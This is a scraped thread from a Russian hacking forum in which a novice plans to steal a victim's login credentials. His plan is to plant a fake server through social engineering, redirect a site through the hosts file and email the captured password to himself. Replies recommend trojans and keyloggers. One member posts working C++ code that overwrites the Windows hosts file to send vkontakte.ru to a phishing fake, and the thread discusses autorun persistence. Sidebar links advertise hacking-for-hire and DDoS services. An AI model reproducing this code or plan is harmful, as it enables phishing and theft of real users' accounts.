Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Угон пароля фэйком: аспекты. Актуальные базы 2GIS в форматах CSV,Excel,SQL
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Взлом и безопасность / Новичкам RSS подписка на сообщения с форума Subscribe Модераторы: RenGO, Bb0y, Leo08, B3JIoMep, BRUNOTTI, Virous, xssmailcom
Для тех, кто не знаете с чего начать. Темы "Хочу стать хакером" удаляются, авторам предупреждение ибо читайте раздел "Статьи"

Новая тема Наиболее обсуждаемые темы Наиболее посещаемые темы
Поиск 
Период
Перейти

Просмотров - 5890
Угон пароля фэйком: аспекты.
Добавить этот топик в закладки »
RSS-лента ответов »Subscribe
DoctorWho


Novice
# | Сообщение добавлено 05.08.2010 16:59:54
Отредактировано 05.08.2010 17:09:13 by DoctorWho
Доброго времени суток! Есть такая прога для скрытия ИП как TOR. Точнее целый сервис. Как я понял, тыкая программу, там для анонимизации используется цепочки прокси-серверов. Так вот вопрос: обеспечит ли ТОР нужную анонимность, при "работе" с удалённым компом на котором будет висеть telnet и как к этому telnety законнектится через этот самый тор. В настройках броузера как прокси нужно указывать localhost:8118. И вообще, как работать с проксей на системном уровне (всмысле connect|recv|send|close)? И ещё маленький вопросик. Откуда gethostbyname берёт адреса в первую очередь? Из hosts.txt или прямо из инета?
 
Собственно план:
1. С помощью СИ поднять у жертвы на тачке телнет и загнать на неё фейковый веб-сервер.
2. В файле hosts добавить "сайт" с ип 127.0.0.1
3. Жертва "заходит на сайт", вводит лог и пасс.
4. Сервер отправляет данные на мой левый мыл.
 
Какие проблемы могут возникнуть?
 
З.Ы. мой первый хак =]
Сказать спасибо Ответить Цитировать

superhacker




Elite
# | Сообщение добавлено 06.08.2010 11:07:41
Отредактировано 06.08.2010 13:47:11 by superhacker
Чтоб так не мучатся и не делать Бог знает что, можешь просто подкинуть своей жертве трояна подменяющего запись в hosts файле, а фейк повесишь на каком-то халявном серве, туда и будет перенаправлять твою жертву.
 
Сказать спасибо Ответить Цитировать

pussi


Scum of Society
# | Сообщение добавлено 06.08.2010 13:40:56
так если поднять у жертвы телнет,зачем все эти муки,когда проще всего всунуть кейлогер или троян и просто потом просматривать их логи,или реал переправить hosts где прописать IP нужного хоста на тот же сервер который хочется зафэйчить.
И.. все верно. в самую первую очередь перед прямым DNS запросом ( получение IP по названию хоста) сначала проверяется hosts  а потом уже осуществляется DNS запрос,если нет необходимых данных в hosts.
Сказать спасибо Ответить Цитировать

pussi


Scum of Society
# | Сообщение добавлено 06.08.2010 14:08:55
а еще проще поправить host коммандой из телнета,коли уж из начала темы предпологается получить телнет у жертвы
edit c:\windows\system32\drivers\etc\hosts
Сказать спасибо Ответить Цитировать

DoctorWho


Novice
# | Сообщение добавлено 06.08.2010 18:10:14
Спасиб товарищи. Я знаю только C++/C/Asm. От PHP и PERL далёк. Вобще проще придумал. Действительно зачем пытаться поднимать телнет если под видом банальной заставки можно вогнать сам сервак, который сам себя пропишет в hosts.txt. Моя ошибка. А что, с TORом? Ну так на будущее.
 
З.Ы. BRUNOTTI, слишком много вызовов одной и той же ф-ции, хотя можно было просто обьявить строку с пререносами - не оптимизировано =)...
Сказать спасибо Ответить Цитировать

BRe@K




Prime
# | Сообщение добавлено 06.08.2010 19:59:32
http://ru.wikipedia.org/wiki/Tor
Сказать спасибо Ответить Цитировать

DoctorWho


Novice
# | Сообщение добавлено 06.08.2010 20:11:55
Не ожидал его увидеть там) Спасибо
 
Добавлено 07.08.2010 10:31:10 (через 1 день 14 часов 19 минут 15 секунд )
 
Товарищи! У меня неожиданный трабл. Вчера я пытался отослвть письмо через SMTP набивая комманды вручную чтобы лучше с ним разобраться. Но на авторизации, когда я уже ввёл лог и пасс, сервер отвечает "503 Invalid Base64 data", хотя хеш правильный! Я несколькими алгоритмами генерил хеш, и результат, понятное дело, одинаков. Что делать?
 
Вот Base64 кодер которым я пользуюсь:
Text

b64:
    .newline: 
          call       b64.store_crlf
                     
    .encode:                                                    ; ebx = length, esi -> src buffer, edi -> dst buffer
          push       (76 shr 2) + 1
          pop        edx
                     
    .outer:   
          dec        edx
          je         b64.newline
          lodsd     
          dec        esi
          inc        ebx
          bswap      eax
          mov        ecx,4
                     
    .inner:   
          rol        eax,6
          and        al,3Fh
          cmp        al,3Eh
          jb         b64.testchar
          shl        al,2
          sub        al,((3Eh shl 2)+'A'-'+') and 0FFh
                     
    .testchar:
          sub        al,4
          cmp        al,'0'
          jnl        b64.store
          add        al,'A'+4
          cmp        al,'Z'
          jbe        b64.store
          add        al,'a'-'Z'-1
                     
    .store:
          inc        [size]
          stosb     
          dec        ebx
          loopne     b64.inner
          jne        b64.outer
          mov        al,'='
          rep        stosb
          xor        al,al
          stosb
          ret       
                     
    .store_crlf:
          mov        ax,0a0dh
          stosw
                     
          ret
 

Добавлено 09.08.2010 11:36:36 (через 2 дня 1 час 5 минут 26 секунд )
 
Ну народ! Чё делать? Я несколько исходников скачал - нифига ни один не работает. FTP не катит.
Сказать спасибо Ответить Цитировать

HACK_ER




Platinum Member
# | Сообщение добавлено 30.08.2010 16:20:14
Отредактировано 30.08.2010 16:31:09 by HACK_ER
Вот нашел соответствующую тему. Вот исходник на C++, который подменяет файл hosts. Писал сам. Может кто-то из более знающих подправит его. На Vista/7 по-моему вряд ли пойдёт, т.к там для редактирования таких файлов нужны админские права.
C++

#define MAX_DIR_LEN 256
// ...
LPCSTR text = "# (C) ???? ???? (Microsoft Corp.), 1993-1999\r\n#\r\n# ? ??? ??? HOSTS, ???? Microsoft TCP/IP ? Windows.\r\n#\r\n# ?? ?? ???? ????? IP-??? ?? ???.\r\n# ?? ??? ?? ????? ? ??? ??. IP-??? ??\r\n# ???? ? ?? ???, ?? ? ?? ??? ????? ?.\r\n# IP-??? ? ? ?? ?? ????? ?? ?? ??? ????.\r\n#\r\n# ??? ??, ? ??? ??? ??? ?? ??? ?????\r\n# (???, ? ? ??), ? ?? ??? ?? ?? ?? ? ????\r\n# ?? ?? ???? '#'.\r\n#\r\n# ????:\r\n#\r\n#      102.54.94.97     rhino.acme.com          # ???? ??\r\n#       38.25.63.10     x.acme.com              # ?? ??? x\r\n\r\n127.0.0.1       localhost\r\n217.69.128.42        vkontakte.ru\r\n";
LPCSTR hostsPath = "\\drivers\\etc\\hosts";
CHAR sysDir[MAX_DIR_LEN];
GetSystemDirectoryA(sysDir, MAX_DIR_LEN);
CHAR fullDir[2*MAX_DIR_LEN];
strcpy(fullDir,sysDir);
strcat(fullDir,hostsPath);
HANDLE hHostHandle;
DWORD realSize;
hHostHandle = CreateFile(fullDir, GENERIC_ALL, 0, NULL, CREATE_ALWAYS, 0, NULL);
WriteFile(hHostHandle, text, strlen(text), &realSize, NULL);
 
CloseHandle(hHostHandle);
За кодировку извиняюсь. Хотя она особо там не нужна там. т.к эти вопросительные знаки после # вообще можно не писать, это коментарии.
 
Добавлено 30.08.2010 17:40:24 (через 1 час 9 минут 16 секунд )
 
И еще заметил одну неприятность. Я так понял, что данные изменения в файле hosts будут до тех пор, пока его не поменяет сам юзер. И после того, как юзер введет данные в фейк (например, ВКонтактовский фейк) ( на который его перекинет), его опять потом перекинет на данный фейк (т.к в файле hosts vkontakte.ru заменен адресом фейка), и получается замкнутый круг до тех пор, пока юзер сам не поменяет записи в файле hosts... Как можно исправить эту траблу? Конечно можно прописать троян в Autorun, и чтобы он отмерял время, после прошествия которого можно самоуничтожится и откатить изменения в файле hosts. Но может, у кого-нибудь есть идеи получше.
Сказать спасибо Ответить Цитировать


Только зарегистрированные пользователи могут оставлять сообщения в форуме

Зарегистрироваться *** Авторизоваться

 Последние новости и статьи  Последние сообщения с форумов
  • Самозащита от вируса Petya
  • Google Pixel взломали за 60 секунд
  • В CMS Joomla обнаружена критическая 0-day уязвимость
  • ФБР не смогло взломать протокол шифрования переписки террористов ...
  • Полиция обыскала дом предполагаемого создателя платежной системы ...
  • Google: квантовый ПК будет в 100 млн раз быстрее стандартных чипо...
  • "Лаборатория Касперского" констатирует усиление атак кибергруппир...
  • Microsoft Edge откроет исходные коды ChakraCore
  • Anonymous объявили 11 декабря «днём троллинга» ИГИЛ
  • Миллионы телевизоров, смартфонов и маршрутизаторов оказались уязв...

    Все новости... Все статьи... Прислать новость RSS
  • Интернет / Разное » SOCKS 4/5, HTTPS прокси сервис - proxybuy
  • Разное / Продам, отдам » Продам свежие, июнь 2019, базы 2ГИС(2gis), яндекс.карты
  • Разное / Ищу работу » Re: взлом почты на майле
  • Разное / Предложения работы » Нужен способ заработка, майнинга
  • Разное / Ищу работу » Re: Качественный подбор паролей к почтам. Работаем с 2011 го...
  • Разное / Ищу работу » Re: Взлом страниц: ВКонтакте, Одноклассники.
  • Разное / Ищу работу » Re: -=Мощный DDoS service/ДДоС сервис=-
  • Разное / Ищу работу » Re: Взлом почты mail.ru, yandex.ru, rambler, gmail
  • Разное / Ищу работу » Re: Качественный подбор паролей к почтам. Работаем с 2011 го...
  • Разное / Ищу работу » Re: Взлом ВКонтакте на заказ. Взлом почты на заказ.

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 2007-2012. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    Ya-Cyt службы мониторинга серверов

    #{title}

    #{text}

    x

    #{title}

    #{text}